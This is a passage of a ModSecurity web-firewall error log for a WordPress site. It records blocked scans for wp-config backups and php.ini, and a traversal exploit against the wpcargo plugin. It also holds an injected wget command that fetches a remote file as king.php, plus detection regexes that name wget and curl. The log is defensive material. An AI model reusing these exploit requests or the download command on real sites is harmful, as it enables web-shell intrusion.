.pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.conf"] [unique_id "Y4oaYVV2mbu8fThFm7Y9GAAAANM"] [Fri Dec 02 10:31:49.135839 2022] [:error] [pid 30971:tid 140189863171840] [client 3.236.147.46:48994] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "Y4oaZbgyGd3csGTCfY-r5gAAABQ"] [Fri Dec 02 10:31:49.945424 2022] [:error] [pid 30971:tid 140190090553088] [client 3.236.147.46:48998] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "Y4oaZbgyGd3csGTCfY-r6AAAAAE"] [Fri Dec 02 12:10:29.041592 2022] [:error] [pid 31432:tid 140190090553088] [client 3.236.147.46:35812] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php.ini"] [unique_id "Y4oxhVV2mbu8fThFm7ZElQAAAME"] [Fri Dec 02 12:11:03.777902 2022] [:error] [pid 30973:tid 140189947098880] [client 3.236.147.46:35932] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Y4oxp7p23WFnYdzg5rs6XQAAAIo"] [Fri Dec 02 12:11:22.974268 2022] [:error] [pid 30972:tid 140189972276992] [client 3.236.147.46:36014] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "Y4oxuhxKn0hGNRA-nxXXRwAAAEc"] [Fri Dec 02 12:11:22.985256 2022] [:error] [pid 30971:tid 140189905135360] [client 3.236.147.46:36016] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "Y4oxurgyGd3csGTCfY-tnQAAAA8"] [Fri Dec 02 12:11:23.652216 2022] [:error] [pid 30973:tid 140189972276992] [client 3.236.147.46:36020] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cfg"] [unique_id "Y4oxu7p23WFnYdzg5rs6ZQAAAIc"] [Fri Dec 02 12:11:23.663003 2022] [:error] [pid 31432:tid 140189921920768] [client 3.236.147.46:36022] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.conf"] [unique_id "Y4oxu1V2mbu8fThFm7ZEugAAAM0"] [Fri Dec 02 12:11:26.799376 2022] [:error] [pid 31432:tid 140189955491584] [client 3.236.147.46:36036] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "Y4oxvlV2mbu8fThFm7ZEvAAAAMk"] [Fri Dec 02 12:11:27.382798 2022] [:error] [pid 30973:tid 140189921920768] [client 3.236.147.46:36040] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "Y4oxv7p23WFnYdzg5rs6aAAAAI0"] [Fri Dec 02 13:45:14.629475 2022] [:error] [pid 30971:tid 140189997455104] [client 5.188.62.140:45834] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4pHurgyGd3csGTCfY-u8AAAAAQ"] [Fri Dec 02 22:32:35.070051 2022] [:error] [pid 31432:tid 140189980669696] [client 195.201.31.56:59794] [client 195.201.31.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y4rDU1V2mbu8fThFm7ZP4QAAAMY"], referer: www.google.com [Fri Dec 02 22:32:35.624867 2022] [:error] [pid 31432:tid 140189846386432] [client 195.201.31.56:59796] [client 195.201.31.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y4rDU1V2mbu8fThFm7ZP4gAAANY"], referer: www.google.com 2022/12/03 00:46:30 [error] 30828#30828: *605286 access forbidden by rule, client: 195.62.53.183, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Dec 03 01:44:12.541017 2022] [:error] [pid 30972:tid 140189871564544] [client 5.188.62.26:37234] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4rwPBxKn0hGNRA-nxXcqgAAAFM"] [Sat Dec 03 02:55:22.471689 2022] [:error] [pid 30971:tid 140189829601024] [client 208.113.204.51:40216] [client 208.113.204.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:X-Dns-Prefetch-Control. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:X-Dns-Prefetch-Control: die(md5(79));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y4sA6rgyGd3csGTCfY-ygQAAABg"] [Sat Dec 03 02:57:04.860832 2022] [:error] [pid 31432:tid 140189921920768] [client 208.113.204.51:40334] [client 208.113.204.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:X-Dns-Prefetch-Control. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:X-Dns-Prefetch-Control: die(md5(79));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/"] [unique_id "Y4sBUFV2mbu8fThFm7ZVZAAAAM0"] [Sat Dec 03 03:28:29.324304 2022] [ssl:warn] [pid 30283:tid 140412599535488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Dec 03 03:28:29.456296 2022] [ssl:warn] [pid 30285:tid 140412599535488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Dec 03 03:28:29.978838 2022] [ssl:warn] [pid 30285:tid 140412599535488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Dec 03 03:28:31.478815 2022] [ssl:warn] [pid 30285:tid 140412599535488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Dec 03 03:28:33.744603 2022] [ssl:warn] [pid 30705:tid 140632921589632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Dec 03 03:28:33.862845 2022] [ssl:warn] [pid 30707:tid 140632921589632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Dec 03 08:47:03.493958 2022] [:error] [pid 30728:tid 140632513238784] [client 3.236.147.46:56544] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php.ini"] [unique_id "Y4tTV9ViFbyKSB92lNWoWQAAAFM"] [Sat Dec 03 08:47:37.222492 2022] [:error] [pid 31354:tid 140632530024192] [client 3.236.147.46:56658] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Y4tTeS50TQbDpUXubJ2p7QAAANE"] [Sat Dec 03 08:47:57.020978 2022] [:error] [pid 30727:tid 140632521631488] [client 3.236.147.46:56726] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "Y4tTjblAjFQ3irWU6GAcPgAAABI"] [Sat Dec 03 08:47:57.031501 2022] [:error] [pid 31354:tid 140632613951232] [client 3.236.147.46:56728] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "Y4tTjS50TQbDpUXubJ2p_AAAAMc"] [Sat Dec 03 08:47:57.672712 2022] [:error] [pid 30728:tid 140632471275264] [client 3.236.147.46:56732] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cfg"] [unique_id "Y4tTjdViFbyKSB92lNWoZwAAAFg"] [Sat Dec 03 08:47:57.682885 2022] [:error] [pid 30729:tid 140632496453376] [client 3.236.147.46:56734] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] 